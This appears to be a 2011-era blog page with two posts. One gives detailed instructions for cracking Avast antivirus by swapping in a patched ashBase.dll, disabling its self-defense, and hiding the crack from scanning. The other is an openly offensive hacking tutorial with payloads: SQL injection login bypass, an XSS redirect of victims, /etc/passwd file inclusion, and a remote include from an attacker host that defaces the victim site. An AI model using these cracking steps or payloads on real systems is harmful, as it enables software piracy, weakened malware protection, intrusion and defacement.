Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Sunday, February 13, 2011

Some Common Problems With their Solutions (Avast 5.1.889 )

 Previous post should be read

Avast Anti-Virus Pro/ IS v5.1.889 + New CRACK - (Till 2037)

Avast Installation and Cracking Instructions


The ashBase.dll file did not get infected suddenly, but apparently it's been added to some virus databases.

One of the previous cracked ashBase.dll files was also detected as a virus.
As written in the install notes, it's just a false positive if it gets detected.


READ THIS IF THE CRACK IS DETECTED AND REMOVED BY AVAST
-------------------------------------------------------------------

1. Open avast > Real Time shield > File System Shield:
Image

2. Click on Expert Settings > Exclusions, and click on "Browse":

Image

3. Browse to the install directory of avast (by default):

C:/Program Files/Alwil Software/Avast5

4. Add the avast folder or cracked ashBase.dll to the Exclusions list of
"File System Shield", and make sure that all three options [R,W,E] are checked!

5. Go to Settings > Exclusion:

Image

6. Click on "Add" to add the avast directory or ashBase.dll to the
Exclusions list (by browsing, as described above):

Image

Restart avast to check if avast still detects the cracked ashBase.dll.

If the above steps didnt work avast will detect the cracked ashBase.dll
if it's started, since avast has to use ashbase.dll when starting!

* If still avast detects the cracked ashBase.dll:
- Go to Expert Settings > click on Actions > Virus, and set it to "Ask",
so that avast wont auto-delete detected files:

Image


More Detail, for preventing avast from detecting the threat as malware!

1) open avast > real time sheild > file system shield

Image

2) click on expert settings

Image

click on exclusions > u have to add the folder in the list > click on browse >

browse to the c:/program files/alwil software/avast5 and add it!

make sure all three options [R,W,E] are checked!!

3)Click OK

Now this should do it for most of u !

restart and check if it still happens ...
if it didnt work as soon as restart u will get the false positive
since avast has to use ashbase.dll everytime before starting!!

if u are still getting the false positive then -

4)Same go to expert settings > click on actions > virus > set it to ask
so that it wont auto-delete !!

Image

-------------------------------------------------------------------------------------------

5) go to settings in top right corner!

Image


6) click on exclusion and add the folder there

Image

Step 6 is only for our satisfaction... it may not really work since we are excluding avast folder itself!
just in case scenario!!

If avast already removed the file.. just follow instruction in torrent to reapply the crack and do all these to prevent scanning!!
read more...

Avast Installation and Cracking Instructions

 Previous post should be read

Avast Anti-Virus Pro/ IS v5.1.889 + New CRACK - (Till 2037)

Some Common Problems With their Solutions (Avast 5.1.889 )


Though the Installation and Patching Instructions are within the patch (click the "Read Me" button) and which you must read carefully and strictly follow before applying the patch, I have adapted and rephrased them for your easiest understanding as follows:

About the crack:
The crack converts a downloaded 30 days trial license for avast!
Pro AV + IS v5.1.889 into a regular license, valid till 22-01-2037.

The crack is only for:
- avast! Internet Security v5.1.889 (32-64 bit, Incl. firewall)
- avast! Pro Antivirus v5.1.889 (32-64 bit, No firewall incl.)
* Trying the crack for another version is useless and won't work. 

Overview of the notes below (especially read note A, B, C):
***********************************************************
A. Installation notes
B. Important notes
C. Help, Troubleshooting, General Info
D. Extra notes
> For re-installing and re-activating avast offline
> If after updating avast the license is expired

A. Installation notes:

  • This cracked ashBase.dll simply should be replaced with the original ashBase.dll.
  • Make sure to read all the (install) notes below, cause you may need them. 
  •  
  • If the crack is detected by your antivirus software then add the crack to the exclusions lists of real-time protection and auto-scan. You may need to disable real-time protection and auto-scan before copying the crack into the avast program directory, and when adding the crack to the exclusions lists. 
  •  
  • If the crack is removed by your antivirus software then restore and exclude the crack through your antivirus (Quarantaine or History, or something similar).
  • Uninstall any previous installed version of avast first.

  1. Disconnect internet during installation.Install avast.IS.5.1.889 or avast.AV.Pro.5.1.889 (not both!) in trial mode.
  2. It's recommended to uncheck "Participate in the avast! community". (Such info is used to add crack signatures etc to virus databases.)
  3. To install additional avast languages choose avast "Custom Installation". > Don't download languages through avast (it will render the license invalid)!
  4. After installation do NOT reboot, and run avast.
  5. At Settings -> Troubleshooting: uncheck "Enable avast! self-defense module".
  6. Launch Windows Task Manager by pressing keyboard keys CTRL - SHIFT - Esc, and let it show all users running processes.
  7. Terminate AvastSvc.exe and AvastUI.exe in Windows Task Manager.
  8. Copy and paste the included cracked ashBase.dll from the crack folder into the avast program directory (replacing the original ashBase.dll file). Default avast program directory -> C:\Program Files\Alwil Software\Avast5
  9. Reboot the computer after pasting the cracked ashBase.dll into the install dir.
  10. Run avast, and check mark again "Enable avast! self-defense module".
  11. At Settings > Updates, set PROGRAM "Automatic update" to > "Manual update".
  12. Connect internet, and make sure that avast can connect to internet.
  13. Click on "Activate" at avast's main screen (SUMMARY -> Current Status)
  14. (or go to Maintenance -> Subscription -> Activate trial period).
  15. Wait a few seconds, and avast will be activated till 22-01-2037.
  16. avast can now be updated, but update ONLY the engine and virus definitions.


B. Important notes:

1. Update ONLY the engine and virus definitions (Auto or Manual):
-> At MAINTENANCE > Update click ONLY on "Update engine and virus definitions".

2. Do NOT update the PROGRAM updates (from version 5.1.889 to a newer version):
-> At MAINTENANCE > Update do NOT click on "Update Program" (it will render
the license invalid) !!!

3. At Settings > Updates, set PROGRAM "Automatic update" to > "Manual update".

4. Don't download languages through avast (it will render the license invalid)!

5. If AvastSvc.exe cannot connect to internet then the license cannot be activated:
-> C:\Program Files\Alwil Software\Avast5\AvastSvc.exe

6. If the avast license cannot be activated then reboot the computer and try again.

7. If avast.setup cannot connect to internet then avast cannot be updated:
-> C:\Program Files\Alwil Software\Avast5\Setup\avast.setup (setup_ais-379.vpx)

8. If avast cannot be updated then reboot the computer and try updating again.



C. Help, Troubleshooting, General Info:
  1. If the avast! "self-defense module" cannot be disabled before rebooting then reboot the computer, and disable avast! self-defense module.
  2. Vista/Windows7 users may need to use another option to terminate AvastUI.exe and AvastSvc.exe (eg. through "active task bar services window" or by using msconfig, and rebooting the computer).
  3. You may need to copy/paste the crack as Administrator.
  4. If the original ashBase.dll cannot be replaced with the cracked ashBase.dll  then just drag out the orignal ashBase.dll, and copy/paste the cracked  ashBase.dll into the same directory. Or eventually copy/paste the cracked ashBase.dll in Safe Mode (F8), using an Administrator account.

To go into Safe Mode: *********************
>> Press (F8) while (re-)starting the computer, and select Safe Mode to continue.
Or:
1. Go to Start -> Run and type msconfig, click OK.
2. In the System Configuration Utility, on the BOOT.INI tab, check /SAFEBOOT
3. Click OK.
4. When asked to restart the computer, click Restart.
>> To turn back to Normal Mode repeat the above 4 steps and uncheck /SAFEBOOT



D. Extra notes:
For re-installing and re-activating avast offline:
  1. Disable "Hide hidden folders" in Windows.
  2. Copy and save the avast license file stored at (default directory): C:\Documents and Settings\All Users\Application Data\Alwil Software\Avast5\license.lic
  3. Uninstall and reinstall avast.
  4. After installation do NOT reboot, and run avast.
  5. At Settings -> Troubleshooting: Uncheck "Enable avast! self-defense module".  If avast! self-defense module can't be disabled before rebooting then reboot,  and disable avast! self-defense module.
  6. Close avast, and terminate AvastUI.exe and AvastSvc.exe through Task Manager.
  7. Copy the included cracked ashBase.dll from the crack folder into the install directory of avast (replacing the original ashBase.dll file). Default install path avast -> C:\Program Files\Alwil Software\Avast5
  8. Reboot the pc, run avast, and click on "Activate" (ignore error messages).
  9. Insert the saved avast license file.
  10. The "avast! self-defense module" can now be enabled again.
  11. >> Done! 

If after updating avast the license is expired:
  1. Disable "Hide hidden folders" in Windows.
  2. Save the license file by dragging it out of (default directory): C:\Documents and Settings\All Users.WINDOWS\Application Data\Alwil Software\Avast5\license  (You may need to disable avast! self-defense module first.)
  3. Copy the included cracked ashBase.dll from the crack folder into the install directory of avast (to have it replaced with the original ashBase.dll file).  Default install path avast -> C:\Program Files\Alwil Software\Avast5
  4. Reboot the pc, run avast, and click on "Activate" (ignore error messages).
  5. Insert the saved avast license file.
  6. The "avast! self-defense module" can now be enabled again. 
  7. >> Done! 
read more...

Sunday, December 5, 2010

The Absolute Basics of Hacking

Intro
Hello and welcome to this tutorial. If you see all the text on this page, and are afraid, you're not meant to be a hacker, quit now. Also, please know now that unlike in the movies, not everything is hackable. I will be writing about the basics of hacking servers; I will cover how to scan and/or exploit vulnerable daemons (services) running on the target server, and how to discover and/or exploit web-script vulnerabilities. You will need to know your way around a computer before reading this. And if you don't know what a word means, Google or Wiki it!; if you don't understand a concept, post here and I will try to clarify. Thanks for reading, hope this helps.


Recommended Tools
Port Scanner - nmap - http://nmap.org/
Browser - FireFox - http://firefox.com/

Daemon Vulnerabilities
Description
Daemons (also commonly known as services) are the processes that run on a computer that allow it to do things such as serve pages with the HTTP protocol, etc. (although they do not always necessarily interact over a network). Sometimes these daemons are poorly coded, which allows for an attacker to send some sort of input to them, and they either crash, or in worse cases, they run any code the attacker chooses.

Scanning For Vulnerabilites
Well, this is where a little common sense comes in, because we need to answer one question: Which ports to scan? Well, with a little googling, we'd know that the default port for the HTTPD (web daemon) is 80, for the FTPD it's 21, etc. So if we wanted to know the version of the HTTPD running on the server, we'd run "nmap targetsite.com -p 80 -sV". NOTICE the -sV argument; it is vital, otherwise nmap will just return whether or not the port is open, and won't provide us with the daemon's version. This is great and all, but we don't want to just scan one port at a time do we? Well nmap has us covered there, so just scan multiple ports by seperating each target port with a comma (,) like so: "nmap targetsite.com -p 21,80 -sV". However, if you don't mind the scan taking a while longer, you can scan a range of ports like so: "nmap targetsite.com -p 1-1000 -sV". This will scan all ports between 1 and 1000.

Checking For Vulnerability
After your scan has finished, nmap will display the open ports on your target, along with their version (if they were identifiable, usually they are). An example return would look like this: "80/tcp open http Apache httpd 2.0.32". Taking this information, we search on milw0rm for "Apache". After skimming through the results, we see that the target is vulnerable to this vulnerability, which when run on the target server will make it crash.

Using the Exploits
This varies, depending on the language that the exploit is coded in; google on how to do this, since it would just be wasting my time how to use all of the different languages here.

Common Web-Script Vulnerabilities
Description
In this section, I will be writing about vulnerabilities in a webserver's server-sided code. Here are the topics I will be covering:
  • SQL Injection
  • XSS (Cross-Site Scripting)
  • RFI/LFI (Remote/Local File Include)
SQL Injection
Description
SQL injection is the act of injection your own, custom-crafted SQL commands into a web-script so that you can manipulate the database any way you want. Some example usages of SQL injection: Bypass login verification, add new admin account, lift passwords, lift credit-card details, etc.; you can access anything that's in the database.

Example Vulnerable Code - login.php (PHP/MySQL)
Here's an example of a vulnerable login code
<?php
$user = $_POST['u'];
$pass = $_POST['p'];

if (!isset($user) || !isset($pass)) {
    echo("<form method=post><input type=text name=u value=Username><br /><input type=password name=p value=Password><br /><input type=submit value=Login></form>");
} else {
    $sql = "SELECT `IP` FROM `users` WHERE `username`='$user' AND `password`='$pass'";
    $ret = mysql_query($sql);
    $ret = mysql_fetch_array($ret);
    if ($ret[0] != "") {
        echo("Welcome, $user.");
    } else {
        echo("Incorrect login details.");
    }
}
?>
 Basically what this code does, is take the username and password input, and takes the users's IP from the database in order to check the validity of the username/password combo.

Testing Inputs For Vulnerability
Just throw an "'" into the inputs, and see if it outputs an error; if so, it's probably injectable. If it doesn't display anything, it might be injectable, and if it is, you will be dealing with blind SQL injection which anyone can tell you is no fun. Else, it's not injectable.

The Example Exploit
Let's say we know the admin's username is Administrator and we want into his account. Since the code doesn't filter our input, we can insert anything we want into the statement, and just let ourselves in. To do this, we would simply put "Administrator" in the username box, and "' OR 1=1--" into the password box; the resulting SQL query to be run against the database would be "SELECT `IP` FROM `users` WHERE `username`='Administrator' AND `password='' OR 1=1--'". Because of the "OR 1=1", it will have the ability to ignore the password requirement, because as we all know, the logic of "OR" only requires one question to result in true for it to succeed, and since 1 always equals 1, it works; the "--" is the 'comment out' character for SQL which means it ignores everything after it, otherwise the last "'" would ruin the syntax, and just cause the query to fail.

XSS (Cross-Site Scripting)
Description
This vulnerability allows for an attacker's input to be sent to unsuspecting victims. The primary usage for this vulnerability is cookie stealing; if an attacker steals your cookie, they can log into whatever site they stole your cookie from under your account (usually, and assuming you were logged in at the time.)

Example Vulnerable Code - search.php (PHP)
<?php
$s = $_GET['search'];
// a real search engine would do some database stuff here
echo("You searched for $s. There were no results found");
?>
 
Testing Inputs For Vulnerability
For this, we test by throwing some HTML into the search engine, such as "<font color=red>XSS</font>". If the site is vulnerable to XSS, you will see something like this: XSS, else, it's not vulnerable.

Example Exploit Code (Redirect)
Because we're mean, we want to redirect the slave to goatse (don't look that up if you don't know what it is) by tricking them into clicking on a link pointed to "search.php?search=<script>window.location='http://goatse.cz/'</script>". This will output "You searched for <script>window.location='http://goatse.cz/'</script>. There were no results found" (HTML) and assuming the target's browser supports JS (JavaScript) which all modern browsers do unless the setting is turned off, it will redirect them to goatse.

RFI/LFI (Remote/Local File Include)
Description
This vulnerability allows the user to include a remote or local file, and have it parsed and executed on the local server.

Example Vulnerable Code - index.php (PHP)
<?php
$page = $_GET['p'];
if (isset($page)) {
    include($page);
} else {
    include("home.php");
}
?>
Testing Inputs For Vulnerability
Try visiting "index.php?p=http://www.google.com/"; if you see Google, it is vulnerable to RFI and consequently LFI. If you don't it's not vulnerable to RFI, but still may be vulnerable to LFI. Assuming the server is running *nix, try viewing "index.php?p=/etc/passwd"; if you see the passwd file, it's vulnerable to LFI; else, it's not vulnerable to RFI or LFI.

Example Exploit
Let's say the target is vulnerable to RFI and we upload the following PHP code to our server
PHP Code:
<?php
unlink("index.php");
system("echo Hacked > index.php");
?>
and then we view "index.php?p=http://our.site.com/malicious.php" then our malicious code will be run on their server, and by doing so, their site will simply say 'Hacked' now.

Conclusion
Tutorial inspired by: the avoidance of homework. Now that you read all that, gtfo.
read more...